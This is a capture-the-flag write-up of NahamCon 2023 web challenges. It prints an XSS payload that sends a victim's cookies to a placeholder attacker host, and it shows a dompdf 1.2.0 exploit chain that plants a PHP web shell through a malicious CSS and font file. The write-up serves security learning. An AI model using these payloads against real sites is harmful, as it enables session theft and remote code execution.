Nahamcon CTF 2023 - Web

Nahamcon CTF 2023 - Web

The third time we attempted the Nahamcon CTF, we didn't have as much availability as a team, and I ended up jumping on web with 8 hours left.

Web Challenges

Hidden Figures

challenge description

I tried to fuzz the website for common easy stuff then tried to carve out more files from the images.

Here’s how it turned out:

Thank you marioFlag


challenge description

This was a blog with only one post and a comment functionality. Here’s my go to payload for stealing cookies with xss:

<img src=x onerror=this.src='http://<YOUR_IP>:<YOUR_PORT>/?'+document.cookie;>

Good thinking, because apparently admin will have a look at my comment.

admin will check shortly

receive admin cookie

With this I managed to send myself the admin cookie and simply replaced it in the browser. This revealed an Admin menu and the flag.



challenge description

We are met with a form allowing us to generate a pdf file at quote.php, with all the form fields appended in the url.

a form to buy stickersversion dompdf 1.2.0 + CPDF

This pdf was generated with dompdf 1.2.0 + CPDF. I had already downloaded and played with this exploit from github before, from positive-security, so I felt at home, even without a vpn. I just modified the original files with my details as shown below, and served them with ngrok.

😉 winking at htb players.


@font-face {


File content available in the github repo
<?php system($_REQUEST['cmd']); ?>

This excellent blog post from details very precisely what we’re going to do next. The following payload goes into the url as is, as a value for 'organization='<link rel=stylesheet href='https://<your-ngrok-url>/exploit.css'>&...

grab md5 hash of your file as does the app

Don’t forget to grab the md5 hash of your file with this command:

echo -n 'https://<your-ngrok-url>/exploit_font.php' | md5sum

or by running this python code as per the article.

import hashlib

At this point I decided to fuzz the url, to make extra sure I would have the correct file path, and confirmed the environnement had a path /dompdf/lib/fonts/ where my exploit_font would be uploaded, from exploit.css.

Since we decided to add a cmd parameter let’s include it in our url:

We can see the content of the exploit_font.php file with the output of our php (containing the flag).

cat flag.txt

by Starry-Lord 18.06.23